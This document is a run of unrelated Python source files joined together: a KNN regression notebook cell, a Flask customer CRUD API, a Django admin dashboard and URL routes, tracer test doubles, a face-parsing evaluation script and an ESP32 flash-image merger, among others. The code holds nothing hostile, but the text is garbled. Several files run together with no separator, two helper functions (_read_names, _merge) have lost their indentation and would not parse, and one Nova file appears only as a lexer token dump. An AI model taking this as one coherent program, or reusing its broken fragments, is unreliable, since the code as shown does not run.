# KNN: scan k = 1..19 and record the validation MSE for each setting.
from sklearn.model_selection import train_test_split
X_train, X_test, Y_train, Y_test = train_test_split(x_train,y_train,test_size=0.20)
from sklearn.neighbors import KNeighborsRegressor
# Will take some time
error_rate = []  # fixed: was appended to below without ever being initialised (NameError)
for i in range(1,20):
    print('training for k=',i)
    knn = KNeighborsRegressor(n_neighbors=i,weights='uniform', algorithm='auto', leaf_size=30, p=2, metric='minkowski')
    knn.fit(X_train,Y_train)
    pred_i = knn.predict(X_test)
    # fixed: np.mean(pred - y)**2 squared the *mean* error (bias only);
    # mean squared error needs the square inside the mean.
    error_rate.append(np.mean((pred_i - Y_test) ** 2))
# Model building and predictions: refit KNN with the chosen k and score the
# real test set.
knn = KNeighborsRegressor(n_neighbors=4,weights='uniform', algorithm='auto', leaf_size=30, p=2, metric='minkowski')
knn.fit(X_train,Y_train)
pred_i = knn.predict(x_test)
# Regression output is continuous; round to the nearest channel count.
y_pred = np.round(pred_i)
submission = pd.read_csv('/kaggle/input/liverpool-ion-switching/sample_submission.csv')
submission['open_channels'] = pd.Series(y_pred, dtype='int32')
# NOTE(review): this astype('int') is redundant with the int32 Series above.
submission['open_channels']=submission['open_channels'].astype('int')
submission.to_csv('submission_knn04.csv', index=False, float_format='%.4f')
submission.head()
|
"""Example module that will be deleted in the future
This file demonstrates proper coding conventions along with how to
document your functions and classes. The docstring format that we are
using is numpy docstrings
https://sphinxcontrib-napoleon.readthedocs.io/en/latest/example_numpy.html
"""
def do_work_sum(a, b):
    """Return the sum of two integers.

    Parameters
    ----------
    a: int
        first integer as input
    b: int
        second integer as input
    Returns
    -------
    int
        sum of a and b
    Example
    -------
    Examples should be written in doctest format, and should
    illustrate how to use the function.
    >>> print(do_work_sum(1, 3))
    4
    """
    total = a + b
    return total
class FooBar:
    """Wrap a fixed greeting between two caller-supplied strings.

    Note
    ----
    Do not include the `self` parameter in the ``Parameters`` section.

    Parameters
    ----------
    biz: str
        special string to start sentences with
    baz: str
        special string to end sentences with
    """

    def __init__(self, biz, baz):
        self.biz = biz
        self.baz = baz

    def hello_world(self):
        """Return the hello-world message framed by biz and baz."""
        return "%s Hello World! %s" % (self.biz, self.baz)
|
from django.utils.translation import ugettext_lazy as _
from grappelli.dashboard import modules, Dashboard
class CustomIndexDashboard(Dashboard):
    """Grappelli admin index dashboard for this project.

    Column 1 groups the content-editing model lists, column 2 holds
    media/administration tools plus recent actions, and column 3 shows the
    Django project weblog feed.
    """
    def __init__(self, **kwargs):
        Dashboard.__init__(self, **kwargs)
        self.children.extend([
            modules.ModelList(
                title=_('People and organizations'),
                column=1,
                models=[
                    'academic.people.*',
                    'academic.organizations.*',],
            ),
            modules.ModelList(
                title=_('Publishing'),
                column=1,
                models=['academic.publishing.*',],
            ),
            modules.ModelList(
                title=_('Projects'),
                column=1,
                models=('academic.projects.*',),
            ),
            # External tool links rather than model admin pages.
            modules.LinkList(
                title=_('Media Management'),
                column=2,
                children=[
                    {
                        'title': _('Browse and upload files'),
                        'url': '/admin/filebrowser/browse/',
                        'external': False,
                    },
                ]
            ),
            modules.ModelList(
                title=_('Content and pages'),
                column=1,
                models=[
                    'academic.content.*',
                    'django.contrib.flatpages.*',
                    'flatcontent.*'],
            ),
            modules.ModelList(
                title=_('Administration'),
                column=2,
                models=[
                    'django.contrib.auth.*',
                    'django.contrib.sites.*'],
            ),
            # Django weblog RSS feed, limited to the five latest entries.
            modules.Feed(
                title=_(''),
                column=3,
                feed_url='http://www.djangoproject.com/rss/weblog/',
                limit=5,
            ),
            modules.RecentActions(
                title='Recent actions',
                column=2,
                limit=5
            ),
        ])
|
from flask import Flask, render_template, request, jsonify
from flask_sqlalchemy import SQLAlchemy
from flask_cors import CORS
import logging
import yaml
app = Flask(__name__)
# Silence werkzeug's per-request access log.
log = logging.getLogger('werkzeug')
log.disabled=True
log.setLevel(logging.ERROR)
# fixed: the original leaked the file handle and called yaml.load() without a
# Loader, which is deprecated and unsafe on untrusted input; safe_load only
# constructs plain Python objects.
with open('database.yaml') as config_file:
    db_config = yaml.safe_load(config_file)
app.config['SQLALCHEMY_DATABASE_URI'] = db_config['uri']
db = SQLAlchemy(app)
CORS(app)
class Cliente(db.Model):
    """SQLAlchemy model for a customer record (name, address, CPF)."""
    __tablename__ = "ClientePython"
    # Auto-incrementing surrogate key.
    id = db.Column(db.Integer, primary_key=True)
    nome = db.Column(db.String(255))
    endereco = db.Column(db.String(255))
    cpf = db.Column(db.String(255))
    def __init__(self, nome, endereco, cpf):
        self.nome = nome
        self.endereco = endereco
        self.cpf = cpf
    def __repr__(self):
        # NOTE(review): the route handlers parse this '/'-joined repr back
        # into fields — that breaks if any field itself contains '/'.
        return '%s/%s/%s/%s' % (self.id, self.nome, self.endereco, self.cpf)
@app.route('/api/Clientes', methods=['POST', 'GET'])
def data():
    """Create (POST) or list (GET) Cliente records as JSON."""
    if request.method == 'POST':
        body = request.json
        nome = body['nome']
        endereco = body['endereco']
        cpf = body['cpf']
        data = Cliente(nome, endereco, cpf)
        db.session.add(data)
        db.session.commit()
        return jsonify({
            'status': 'Cliente foi inserido!',
            'nome': nome,
            'endereco': endereco,
            'cpf': cpf
        })
    if request.method == 'GET':
        clientes = Cliente.query.order_by(Cliente.id).all()
        # fixed: the original round-tripped each row through repr() and
        # str.split('/'), which breaks as soon as any field contains '/'.
        # Read the mapped attributes directly instead.
        dataJson = [
            {
                'id': str(c.id),
                'nome': c.nome,
                'endereco': c.endereco,
                'cpf': c.cpf
            }
            for c in clientes
        ]
        return jsonify(dataJson)
@app.route('/cliente/<string:id>', methods=['GET', 'DELETE', 'PUT'])
def onedata(id):
    """Fetch, delete, or update a single Cliente by primary key."""
    if request.method == 'GET':
        cliente = Cliente.query.get(id)
        # fixed: parse-by-repr broke when a field contained '/'; read the
        # mapped attributes directly.
        return jsonify({
            'id': str(cliente.id),
            'nome': cliente.nome,
            'endereco': cliente.endereco,
            'cpf': cliente.cpf
        })
    if request.method == 'DELETE':
        delData = Cliente.query.filter_by(id=id).first()
        db.session.delete(delData)
        db.session.commit()
        return jsonify({'status': 'Cliente '+id+' foi excluido!'})
    if request.method == 'PUT':
        body = request.json
        editData = Cliente.query.filter_by(id=id).first()
        editData.nome = body['nome']
        editData.endereco = body['endereco']
        editData.cpf = body['cpf']
        db.session.commit()
        return jsonify({'status': 'Cliente '+id+' foi atualizado!'})
@app.route('/')
def hello():
    """Root route: plain-text greeting."""
    return "Hello World!"
@app.route('/ping')
def ping():
    """Liveness probe: responds with a constant body."""
    return "Pong"
if __name__ == '__main__':
    import os
    # Host/port come from the environment, with local defaults; a malformed
    # SERVER_PORT falls back to 5555.
    server_host = os.environ.get('SERVER_HOST', 'localhost')
    try:
        server_port = int(os.environ.get('SERVER_PORT', '5555'))
    except ValueError:
        server_port = 5555
    app.run(server_host, server_port, debug=False, threaded=True, use_debugger=False)
|
from enum import Flag
class AstronomyEventType(Flag):
    """Bit flags for astronomy events; members can be OR-combined."""
    Rise = 0b01
    Set = 0b10
|
class DummyTracer(object):
    """Minimal tracer test double that records every span it starts."""

    def __init__(self, with_subtracer=False):
        super(DummyTracer, self).__init__()
        if with_subtracer:
            self._tracer = object()
        self.spans = []

    def clear(self):
        """Forget all recorded spans."""
        self.spans = []

    def start_span(self, operation_name, child_of=None):
        """Create, record, and return a new DummySpan."""
        new_span = DummySpan(operation_name, child_of=child_of)
        self.spans.append(new_span)
        return new_span
class DummySpan(object):
    """Minimal span test double tracking its tags and finished state."""

    def __init__(self, operation_name='span', child_of=None):
        super(DummySpan, self).__init__()
        self.operation_name = operation_name
        self.child_of = child_of
        self.tags = {}
        self.is_finished = False

    def set_tag(self, name, value):
        """Record a tag; overwrites any previous value for *name*."""
        self.tags[name] = value

    def finish(self):
        """Mark the span complete."""
        self.is_finished = True
|
begin_unit
comment|'# Copyright (C) 2014, Red Hat, Inc.'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Licensed under the Apache License, Version 2.0 (the "License"); you may'
nl|'\n'
comment|'# not use this file except in compliance with the License. You may obtain'
nl|'\n'
comment|'# a copy of the License at'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# http://www.apache.org/licenses/LICENSE-2.0'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Unless required by applicable law or agreed to in writing, software'
nl|'\n'
comment|'# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT'
nl|'\n'
comment|'# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the'
nl|'\n'
comment|'# License for the specific language governing permissions and limitations'
nl|'\n'
comment|'# under the License.'
nl|'\n'
nl|'\n'
name|'from'
name|'oslo_utils'
name|'import'
name|'versionutils'
newline|'\n'
nl|'\n'
name|'from'
name|'nova'
name|'import'
name|'db'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'exception'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'objects'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'objects'
name|'import'
name|'base'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'objects'
name|'import'
name|'fields'
newline|'\n'
nl|'\n'
nl|'\n'
op|'@'
name|'base'
op|'.'
name|'NovaObjectRegistry'
op|'.'
name|'register'
newline|'\n'
DECL|class|VirtualInterface
name|'class'
name|'VirtualInterface'
op|'('
name|'base'
op|'.'
name|'NovaPersistentObject'
op|','
name|'base'
op|'.'
name|'NovaObject'
op|')'
op|':'
newline|'\n'
comment|'# Version 1.0: Initial version'
nl|'\n'
comment|'# Version 1.1: Add tag field'
nl|'\n'
DECL|variable|VERSION
indent|' '
name|'VERSION'
op|'='
string|"'1.1'"
newline|'\n'
nl|'\n'
DECL|variable|fields
name|'fields'
op|'='
op|'{'
nl|'\n'
string|"'id'"
op|':'
name|'fields'
op|'.'
name|'IntegerField'
op|'('
op|')'
op|','
nl|'\n'
string|"'address'"
op|':'
name|'fields'
op|'.'
name|'StringField'
op|'('
name|'nullable'
op|'='
name|'True'
op|')'
op|','
nl|'\n'
string|"'network_id'"
op|':'
name|'fields'
op|'.'
name|'IntegerField'
op|'('
op|')'
op|','
nl|'\n'
string|"'instance_uuid'"
op|':'
name|'fields'
op|'.'
name|'UUIDField'
op|'('
op|')'
op|','
nl|'\n'
string|"'uuid'"
op|':'
name|'fields'
op|'.'
name|'UUIDField'
op|'('
op|')'
op|','
nl|'\n'
string|"'tag'"
op|':'
name|'fields'
op|'.'
name|'StringField'
op|'('
name|'nullable'
op|'='
name|'True'
op|')'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
DECL|member|obj_make_compatible
name|'def'
name|'obj_make_compatible'
op|'('
name|'self'
op|','
name|'primitive'
op|','
name|'target_version'
op|')'
op|':'
newline|'\n'
indent|' '
name|'target_version'
op|'='
name|'versionutils'
op|'.'
name|'convert_version_to_tuple'
op|'('
name|'target_version'
op|')'
newline|'\n'
name|'if'
name|'target_version'
op|'<'
op|'('
number|'1'
op|','
number|'1'
op|')'
name|'and'
string|"'tag'"
name|'in'
name|'primitive'
op|':'
newline|'\n'
indent|' '
name|'del'
name|'primitive'
op|'['
string|"'tag'"
op|']'
newline|'\n'
nl|'\n'
dedent|''
dedent|''
op|'@'
name|'staticmethod'
newline|'\n'
DECL|member|_from_db_object
name|'def'
name|'_from_db_object'
op|'('
name|'context'
op|','
name|'vif'
op|','
name|'db_vif'
op|')'
op|':'
newline|'\n'
indent|' '
name|'for'
name|'field'
name|'in'
name|'vif'
op|'.'
name|'fields'
op|':'
newline|'\n'
indent|' '
name|'setattr'
op|'('
name|'vif'
op|','
name|'field'
op|','
name|'db_vif'
op|'['
name|'field'
op|']'
op|')'
newline|'\n'
dedent|''
name|'vif'
op|'.'
name|'_context'
op|'='
name|'context'
newline|'\n'
name|'vif'
op|'.'
name|'obj_reset_changes'
op|'('
op|')'
newline|'\n'
name|'return'
name|'vif'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'base'
op|'.'
name|'remotable_classmethod'
newline|'\n'
DECL|member|get_by_id
name|'def'
name|'get_by_id'
op|'('
name|'cls'
op|','
name|'context'
op|','
name|'vif_id'
op|')'
op|':'
newline|'\n'
indent|' '
name|'db_vif'
op|'='
name|'db'
op|'.'
name|'virtual_interface_get'
op|'('
name|'context'
op|','
name|'vif_id'
op|')'
newline|'\n'
name|'if'
name|'db_vif'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'cls'
op|'.'
name|'_from_db_object'
op|'('
name|'context'
op|','
name|'cls'
op|'('
op|')'
op|','
name|'db_vif'
op|')'
newline|'\n'
nl|'\n'
dedent|''
dedent|''
op|'@'
name|'base'
op|'.'
name|'remotable_classmethod'
newline|'\n'
DECL|member|get_by_uuid
name|'def'
name|'get_by_uuid'
op|'('
name|'cls'
op|','
name|'context'
op|','
name|'vif_uuid'
op|')'
op|':'
newline|'\n'
indent|' '
name|'db_vif'
op|'='
name|'db'
op|'.'
name|'virtual_interface_get_by_uuid'
op|'('
name|'context'
op|','
name|'vif_uuid'
op|')'
newline|'\n'
name|'if'
name|'db_vif'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'cls'
op|'.'
name|'_from_db_object'
op|'('
name|'context'
op|','
name|'cls'
op|'('
op|')'
op|','
name|'db_vif'
op|')'
newline|'\n'
nl|'\n'
dedent|''
dedent|''
op|'@'
name|'base'
op|'.'
name|'remotable_classmethod'
newline|'\n'
DECL|member|get_by_address
name|'def'
name|'get_by_address'
op|'('
name|'cls'
op|','
name|'context'
op|','
name|'address'
op|')'
op|':'
newline|'\n'
indent|' '
name|'db_vif'
op|'='
name|'db'
op|'.'
name|'virtual_interface_get_by_address'
op|'('
name|'context'
op|','
name|'address'
op|')'
newline|'\n'
name|'if'
name|'db_vif'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'cls'
op|'.'
name|'_from_db_object'
op|'('
name|'context'
op|','
name|'cls'
op|'('
op|')'
op|','
name|'db_vif'
op|')'
newline|'\n'
nl|'\n'
dedent|''
dedent|''
op|'@'
name|'base'
op|'.'
name|'remotable_classmethod'
newline|'\n'
DECL|member|get_by_instance_and_network
name|'def'
name|'get_by_instance_and_network'
op|'('
name|'cls'
op|','
name|'context'
op|','
name|'instance_uuid'
op|','
name|'network_id'
op|')'
op|':'
newline|'\n'
indent|' '
name|'db_vif'
op|'='
name|'db'
op|'.'
name|'virtual_interface_get_by_instance_and_network'
op|'('
name|'context'
op|','
nl|'\n'
name|'instance_uuid'
op|','
name|'network_id'
op|')'
newline|'\n'
name|'if'
name|'db_vif'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'cls'
op|'.'
name|'_from_db_object'
op|'('
name|'context'
op|','
name|'cls'
op|'('
op|')'
op|','
name|'db_vif'
op|')'
newline|'\n'
nl|'\n'
dedent|''
dedent|''
op|'@'
name|'base'
op|'.'
name|'remotable'
newline|'\n'
DECL|member|create
name|'def'
name|'create'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'if'
name|'self'
op|'.'
name|'obj_attr_is_set'
op|'('
string|"'id'"
op|')'
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'exception'
op|'.'
name|'ObjectActionError'
op|'('
name|'action'
op|'='
string|"'create'"
op|','
nl|'\n'
name|'reason'
op|'='
string|"'already created'"
op|')'
newline|'\n'
dedent|''
name|'updates'
op|'='
name|'self'
op|'.'
name|'obj_get_changes'
op|'('
op|')'
newline|'\n'
name|'db_vif'
op|'='
name|'db'
op|'.'
name|'virtual_interface_create'
op|'('
name|'self'
op|'.'
name|'_context'
op|','
name|'updates'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_from_db_object'
op|'('
name|'self'
op|'.'
name|'_context'
op|','
name|'self'
op|','
name|'db_vif'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'base'
op|'.'
name|'remotable_classmethod'
newline|'\n'
DECL|member|delete_by_instance_uuid
name|'def'
name|'delete_by_instance_uuid'
op|'('
name|'cls'
op|','
name|'context'
op|','
name|'instance_uuid'
op|')'
op|':'
newline|'\n'
indent|' '
name|'db'
op|'.'
name|'virtual_interface_delete_by_instance'
op|'('
name|'context'
op|','
name|'instance_uuid'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
dedent|''
dedent|''
op|'@'
name|'base'
op|'.'
name|'NovaObjectRegistry'
op|'.'
name|'register'
newline|'\n'
DECL|class|VirtualInterfaceList
name|'class'
name|'VirtualInterfaceList'
op|'('
name|'base'
op|'.'
name|'ObjectListBase'
op|','
name|'base'
op|'.'
name|'NovaObject'
op|')'
op|':'
newline|'\n'
comment|'# Version 1.0: Initial version'
nl|'\n'
DECL|variable|VERSION
indent|' '
name|'VERSION'
op|'='
string|"'1.0'"
newline|'\n'
DECL|variable|fields
name|'fields'
op|'='
op|'{'
nl|'\n'
string|"'objects'"
op|':'
name|'fields'
op|'.'
name|'ListOfObjectsField'
op|'('
string|"'VirtualInterface'"
op|')'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
op|'@'
name|'base'
op|'.'
name|'remotable_classmethod'
newline|'\n'
DECL|member|get_all
name|'def'
name|'get_all'
op|'('
name|'cls'
op|','
name|'context'
op|')'
op|':'
newline|'\n'
indent|' '
name|'db_vifs'
op|'='
name|'db'
op|'.'
name|'virtual_interface_get_all'
op|'('
name|'context'
op|')'
newline|'\n'
name|'return'
name|'base'
op|'.'
name|'obj_make_list'
op|'('
name|'context'
op|','
name|'cls'
op|'('
name|'context'
op|')'
op|','
nl|'\n'
name|'objects'
op|'.'
name|'VirtualInterface'
op|','
name|'db_vifs'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'staticmethod'
newline|'\n'
op|'@'
name|'db'
op|'.'
name|'select_db_reader_mode'
newline|'\n'
DECL|member|_db_virtual_interface_get_by_instance
name|'def'
name|'_db_virtual_interface_get_by_instance'
op|'('
name|'context'
op|','
name|'instance_uuid'
op|','
nl|'\n'
name|'use_slave'
op|'='
name|'False'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'db'
op|'.'
name|'virtual_interface_get_by_instance'
op|'('
name|'context'
op|','
name|'instance_uuid'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'base'
op|'.'
name|'remotable_classmethod'
newline|'\n'
DECL|member|get_by_instance_uuid
name|'def'
name|'get_by_instance_uuid'
op|'('
name|'cls'
op|','
name|'context'
op|','
name|'instance_uuid'
op|','
name|'use_slave'
op|'='
name|'False'
op|')'
op|':'
newline|'\n'
indent|' '
name|'db_vifs'
op|'='
name|'cls'
op|'.'
name|'_db_virtual_interface_get_by_instance'
op|'('
nl|'\n'
name|'context'
op|','
name|'instance_uuid'
op|','
name|'use_slave'
op|'='
name|'use_slave'
op|')'
newline|'\n'
name|'return'
name|'base'
op|'.'
name|'obj_make_list'
op|'('
name|'context'
op|','
name|'cls'
op|'('
name|'context'
op|')'
op|','
nl|'\n'
name|'objects'
op|'.'
name|'VirtualInterface'
op|','
name|'db_vifs'
op|')'
newline|'\n'
dedent|''
dedent|''
endmarker|''
end_unit
|
from django import template
register = template.Library()
@register.filter(name='saludo')
def saludo(value):
    """Template filter: render a green welcome banner for *value*.

    Appends a "name too long" notice when the name has 8+ characters.
    """
    suffix = ''
    if len(value) >= 8:
        suffix = "<p>Tu nombre es muy largo</p>"
    return f"<h1 style='background:green;color:white;'>Bienvenido {value}</h1>" + suffix
import util
from util.include import *
# Arrow constants: [signed step, direction name] pairs.
# NOTE(review): the consumer is not visible here — presumably movement code
# in `util`; confirm the meaning of the numeric component there.
arrow_up = [-1, "up"]
arrow_down = [1, "down"]
arrow_left = [-1, "left"]
arrow_right = [1, "right"]
|
from django.urls import path
from django.views.generic import TemplateView
from articleapp.views import ArticleDetailView, ArticleCreateView, ArticleUpdateView, ArticleDeleteView, ArticleListView
app_name = 'articleapp'  # URL namespace: reverse with 'articleapp:<name>'
# Article CRUD routes; detail/update/delete take the target article's pk.
urlpatterns = [
    path('list/', ArticleListView.as_view(), name='list'),
    path('create/', ArticleCreateView.as_view(), name='create'),
    path('detail/<int:pk>', ArticleDetailView.as_view(), name='detail'),
    path('update/<int:pk>', ArticleUpdateView.as_view(), name='update'),
    path('delete/<int:pk>', ArticleDeleteView.as_view(), name='delete'),
]
import numpy as np
import cv2
import os
import json
from collections import OrderedDict
import argparse
from PIL import Image as PILImage
from utils.transforms import transform_parsing
from tqdm import tqdm
# Face-parsing class names; list index == integer label id.
# NOTE(review): presumably matches the dataset's label_names.txt ordering —
# confirm before relying on it for reporting.
LABELS = ['background', 'skin', 'nose', 'eye_g', 'l_eye', 'r_eye', 'l_brow', 'r_brow', 'l_ear', 'r_ear', 'mouth', 'u_lip', 'l_lip', 'hair', 'hat', 'ear_r', 'neck_l', 'neck', 'cloth']
def get_palette(num_cls):
    """ Returns the color map for visualizing the segmentation mask.
    Args:
        num_cls: Number of classes
    Returns:
        The color map as a flat [R0, G0, B0, R1, G1, B1, ...] list
    """
    palette = [0] * (num_cls * 3)
    for j in range(num_cls):
        # Spread the bits of the label id across the high bits of R/G/B so
        # nearby ids get visually distinct colors.
        lab = j
        red = green = blue = 0
        bit = 7
        while lab:
            red |= ((lab >> 0) & 1) << bit
            green |= ((lab >> 1) & 1) << bit
            blue |= ((lab >> 2) & 1) << bit
            bit -= 1
            lab >>= 3
        palette[j * 3 + 0] = red
        palette[j * 3 + 1] = green
        palette[j * 3 + 2] = blue
    return palette
def get_confusion_matrix(gt_label, pred_label, num_classes):
    """
    Compute the confusion matrix for a pair of flat label arrays.

    :param gt_label: ground truth labels (values expected in [0, num_classes))
    :param pred_label: predicted labels (values expected in [0, num_classes))
    :param num_classes: the number of classes
    :return: (num_classes, num_classes) float array; entry [i, j] counts
        pixels with ground truth i predicted as j
    """
    index = (gt_label * num_classes + pred_label).astype('int32')
    # Vectorised: replaces the original O(num_classes^2) Python double loop.
    # minlength pads short counts and the slice drops any out-of-range bins,
    # matching the original's `cur_index < len(label_count)` guard.
    label_count = np.bincount(index, minlength=num_classes ** 2)
    return label_count[:num_classes ** 2].reshape(num_classes, num_classes).astype(float)
def fast_histogram(a, b, na, nb):
    '''
    fast histogram calculation
    ---
    * a, b: non negative label ids, a.shape == b.shape, a in [0, ... na-1], b in [0, ..., nb-1]
    '''
    assert a.shape == b.shape
    assert np.all((a >= 0) & (a < na) & (b >= 0) & (b < nb))
    # Encode each (a, b) pair as a single bin index, count, then unfold.
    flat_a = a.reshape(-1).astype(int)
    flat_b = b.reshape(-1).astype(int)
    hist = np.bincount(flat_a * nb + flat_b, minlength=na * nb)
    hist = hist.reshape(na, nb)
    assert np.sum(hist) == a.size
    return hist
def _read_names(file_name):
label_names = []
for name in open(file_name, 'r'):
name = name.strip()
if len(name) > 0:
label_names.append(name)
return label_names
def _merge(*list_pairs):
a = []
b = []
for al, bl in list_pairs:
a += al
b += bl
return a, b
def compute_mean_ioU(preds, scales, centers, num_classes, datadir, input_size=[473, 473], dataset='val', reverse=False):
    """Evaluate predicted parsing maps against ground-truth label images.

    Computes per-class IoU plus pixel/mean accuracy (from the confusion
    matrix) and per-region F1 scores (from per-image histograms).

    preds/scales/centers: per-image network outputs and the crop parameters
        needed to warp each prediction back to the original image size.
    num_classes: number of classes in the confusion matrix.
    datadir: dataset root containing <dataset>/files.txt, <dataset>/labels/
        and label_names.txt.
    input_size: network input resolution used by transform_parsing.
    dataset: split subdirectory name.
    reverse: if True, additionally un-projects each prediction with the
        per-image affine stored under <datadir>/project/<im_name>.npy.
    Returns (mIoU_value, f1_value): two OrderedDicts of named metrics.
    """
    file_list_name = os.path.join(datadir, dataset + '/files.txt')
    # NOTE(review): this file handle is never closed explicitly.
    val_id = [line.strip() for line in open(file_list_name).readlines()]
    confusion_matrix = np.zeros((num_classes, num_classes))
    label_names_file = os.path.join(datadir, 'label_names.txt')
    # The same name list serves both axes (gt rows, pred columns).
    gt_label_names = pred_label_names = _read_names(label_names_file)
    assert gt_label_names[0] == pred_label_names[0] == 'bg'
    hists = []
    for i, im_name in enumerate(val_id):
        gt_path = os.path.join(datadir, dataset , 'labels', im_name + '.png')
        gt = cv2.imread(gt_path, cv2.IMREAD_GRAYSCALE)
        h, w = gt.shape
        pred_out = preds[i]
        s = scales[i]
        c = centers[i]
        # Warp the prediction from network space back to the original image.
        pred = transform_parsing(pred_out, c, s, w, h, input_size)
        if reverse:
            proj = np.load(os.path.join(datadir, 'project', im_name + '.npy'))
            pred = cv2.warpAffine(pred, proj, (gt.shape[1], gt.shape[0]), borderValue=0, flags = cv2.INTER_NEAREST)
        gt = np.asarray(gt, dtype=np.int32)
        pred = np.asarray(pred, dtype=np.int32)
        # 255 marks ignored pixels in the ground truth.
        ignore_index = gt != 255
        gt = gt[ignore_index]
        pred = pred[ignore_index]
        hist = fast_histogram(gt, pred,
                              len(gt_label_names), len(pred_label_names))
        hists.append(hist)
        confusion_matrix += get_confusion_matrix(gt, pred, num_classes)
    hist_sum = np.sum(np.stack(hists, axis=0), axis=0)
    # Map each evaluation region name to (gt indices, pred indices); merged
    # regions (eyes, brows, mouth, overall) combine several base labels.
    eval_names = dict()
    for label_name in gt_label_names:
        gt_ind = gt_label_names.index(label_name)
        pred_ind = pred_label_names.index(label_name)
        eval_names[label_name] = ([gt_ind], [pred_ind])
    if 'le' in eval_names and 're' in eval_names:
        eval_names['eyes'] = _merge(eval_names['le'], eval_names['re'])
    if 'lb' in eval_names and 'rb' in eval_names:
        eval_names['brows'] = _merge(eval_names['lb'], eval_names['rb'])
    if 'ulip' in eval_names and 'imouth' in eval_names and 'llip' in eval_names:
        eval_names['mouth'] = _merge(
            eval_names['ulip'], eval_names['imouth'], eval_names['llip'])
    if 'eyes' in eval_names and 'brows' in eval_names and 'nose' in eval_names and 'mouth' in eval_names:
        eval_names['overall'] = _merge(
            eval_names['eyes'], eval_names['brows'], eval_names['nose'], eval_names['mouth'])
    print(eval_names)
    pos = confusion_matrix.sum(1)
    res = confusion_matrix.sum(0)
    tp = np.diag(confusion_matrix)
    pixel_accuracy = (tp.sum() / pos.sum()) * 100
    mean_accuracy = ((tp / np.maximum(1.0, pos)).mean()) * 100
    # IoU per class: tp / (gt + pred - tp), guarded against empty classes.
    IoU_array = (tp / np.maximum(1.0, pos + res - tp))
    IoU_array = IoU_array * 100
    mean_IoU = IoU_array.mean()
    print('Pixel accuracy: %f \n' % pixel_accuracy)
    print('Mean accuracy: %f \n' % mean_accuracy)
    print('Mean IU: %f \n' % mean_IoU)
    mIoU_value = []
    f1_value = []
    for i, (label, iou) in enumerate(zip(LABELS, IoU_array)):
        mIoU_value.append((label, iou))
    for eval_name, (gt_inds, pred_inds) in eval_names.items():
        # F1 from the summed histogram: 2*|intersection| / (|gt| + |pred|).
        A = hist_sum[gt_inds, :].sum()
        B = hist_sum[:, pred_inds].sum()
        intersected = hist_sum[gt_inds, :][:, pred_inds].sum()
        f1 = 2 * intersected / (A + B)
        print(f'f1_{eval_name}={f1}')
        f1_value.append((eval_name, f1))
    mIoU_value.append(('Pixel accuracy', pixel_accuracy))
    mIoU_value.append(('Mean accuracy', mean_accuracy))
    mIoU_value.append(('Mean IU', mean_IoU))
    mIoU_value = OrderedDict(mIoU_value)
    f1_value = OrderedDict(f1_value)
    return mIoU_value, f1_value
def write_results(preds, scales, centers, datadir, dataset, result_dir, input_size=[473, 473]):
    """Save predicted parsing maps as palettised PNGs under *result_dir*.

    preds/scales/centers: per-image predictions and crop parameters; image
        metadata (name, original size) comes from the split's JSON file.
    """
    palette = get_palette(20)
    # fixed: exist_ok avoids the check-then-create race of the original
    # os.path.exists()/makedirs() pair.
    os.makedirs(result_dir, exist_ok=True)
    json_file = os.path.join(datadir, 'annotations', dataset + '.json')
    with open(json_file) as data_file:
        data_list = json.load(data_file)
        data_list = data_list['root']
    for item, pred_out, s, c in zip(data_list, preds, scales, centers):
        im_name = item['im_name']
        w = item['img_width']
        h = item['img_height']
        # Warp the network-space prediction back to the original image size.
        pred = transform_parsing(pred_out, c, s, w, h, input_size)
        save_path = os.path.join(result_dir, im_name[:-4]+'.png')
        output_im = PILImage.fromarray(np.asarray(pred, dtype=np.uint8))
        output_im.putpalette(palette)
        output_im.save(save_path)
def get_arguments():
    """Parse all the arguments provided from the CLI.
    Returns:
        The parsed argparse.Namespace of arguments.
    """
    parser = argparse.ArgumentParser(description="DeepLabLFOV NetworkEv")
    # Both paths default to '' — callers must validate before use.
    parser.add_argument("--pred-path", type=str, default='',
                        help="Path to predicted segmentation.")
    parser.add_argument("--gt-path", type=str, default='',
                        help="Path to the groundtruth dir.")
    return parser.parse_args()
import sys
# Merge bootloader / partition-table / application binaries into a single
# flash image, padding the gaps between offsets with 0xFF (erased-flash
# value). Usage: script <bootloader> <partitions> <application> <out>.
# NOTE(review): the offsets look like a standard ESP32 layout — confirm
# against the target's partition table.
OFFSET_BOOTLOADER = 0x1000
OFFSET_PARTITIONS = 0x8000
OFFSET_APPLICATION = 0x10000
files_in = [
    ('bootloader', OFFSET_BOOTLOADER, sys.argv[1]),
    ('partitions', OFFSET_PARTITIONS, sys.argv[2]),
    ('application', OFFSET_APPLICATION, sys.argv[3]),
]
file_out = sys.argv[4]
cur_offset = 0
with open(file_out, 'wb') as fout:
    for name, offset, file_in in files_in:
        # Images must be listed in ascending offset order and must not overlap.
        assert offset >= cur_offset
        fout.write(b'\xff' * (offset - cur_offset))
        cur_offset = offset
        with open(file_in, 'rb') as fin:
            data = fin.read()
            fout.write(data)
            cur_offset += len(data)
            print('%-12s% 8d' % (name, len(data)))
print('%-12s% 8d' % ('total', cur_offset))
|
from .models import Images,Items
from django import forms
from django.forms.models import inlineformset_factory
class Imageform(forms.ModelForm) :
